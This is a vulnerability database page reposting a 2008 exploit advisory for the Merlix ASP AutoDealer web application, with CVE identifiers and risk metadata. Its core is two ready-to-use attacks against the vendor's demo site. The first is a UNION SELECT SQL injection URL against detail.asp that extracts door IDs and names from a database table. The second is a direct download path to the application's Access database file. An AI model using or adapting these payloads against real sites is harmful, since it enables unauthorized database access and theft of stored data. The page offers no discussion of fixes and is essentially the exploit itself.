ASP AutoDealer (SQL/DD) Multiple Remote Vulnerabilities

2008.12.19
Credit: OffensiveTrack
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-5595 | CVE-2008-5608
CWE: CWE-89

########################################################################### #-----------------------------OffensiveTrack------------------------------# ########################################################################### ---------------------------- Tunisia Muslim ------------------------------ #found by : OffensiveTrack #Author : AlpHaNiX #website : www.offensivetrack.org #contact : AlpHa[AT]HACKER[DOT]BZ ########################################################################### #script : Merlix ASP AutoDealer #download : null #Demo : http://demo.merlix.com/autodealer/ #Exploits : --=[SQL INJECTION]=-- http://demo.merlix.com/autodealer/detail.asp?ID=-0+union+select+1,null,null,0,null,CDDoorID,null,null,null,null,CDDoorName,null,null,null,null,null,17+from+CDDOOR --=[DATABASE DISCLOSURE]=-- http://demo.merlix.com/autodealer/auto.mdb #Greetz For -|-Me!sTeR-|- ###########################################################################

References:

http://packetstormsecurity.org/0812-exploits/aspautodealer-sqldisclose.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top